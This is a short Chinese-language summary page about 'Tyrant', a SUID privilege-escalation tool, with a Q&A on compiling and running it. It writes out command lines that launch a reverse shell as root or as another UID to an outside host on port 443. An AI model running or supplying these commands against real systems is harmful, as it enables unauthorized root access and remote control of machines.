Tyrant(暴君) SUID二进制文件权限提升工具
💡
原文中文,约900字,阅读约需3分钟。
📝
内容提要
TyrantTyrant 是一个 SUID 二进制特权升级工具,允许低权限用户获取根权限。支持通过命令编译和运行,并可指定 UID 进行反向 Shell。使用时需遵守网络安全法,作者不承担因使用信息造成的责任。
🎯
关键要点
- TyrantTyrant 是一个 SUID 二进制特权升级工具,允许低权限用户获取根权限。
- 使用命令编译源代码:$ gcc tyrant.c -o tyrant。
- 运行工具以获取当前用户的 UID 和其他用户详细信息:$ ./tyrant。
- 指定 UID 进行反向 Shell,必须结合其他漏洞使用。
- 以根权限启动反向 Shell 的命令:# ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443。
- 可以通过指定其他 UID 切换到不同用户:# ./tyrant -uid 33 -rhost 192.168.176.129 -rport 443。
- 免责声明:技术信息仅供参考,使用需遵守《中华人民共和国网络安全法》。
- 文中技术内容可能不适用于所有情况,需充分测试和评估。
- 文章内容可能存在滞后性,读者需自行判断信息的时效性。
❓
延伸问答
Tyrant工具的主要功能是什么?
Tyrant是一个SUID二进制特权升级工具,允许低权限用户获取根权限。
如何编译和运行Tyrant工具?
使用命令$ gcc tyrant.c -o tyrant编译源代码,然后运行$ ./tyrant获取UID和用户信息。
如何使用Tyrant进行反向Shell?
要以根权限启动反向Shell,使用命令# ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443。
Tyrant工具是否有使用限制?
使用Tyrant时需遵守《中华人民共和国网络安全法》,并且技术内容可能不适用于所有情况。
如何切换到不同的用户?
可以通过指定其他UID,例如# ./tyrant -uid 33 -rhost 192.168.176.129 -rport 443,来切换到不同用户。
使用Tyrant工具时需要注意什么?
必须结合其他漏洞使用,且低权限用户启动反向Shell将会失败。
➡️
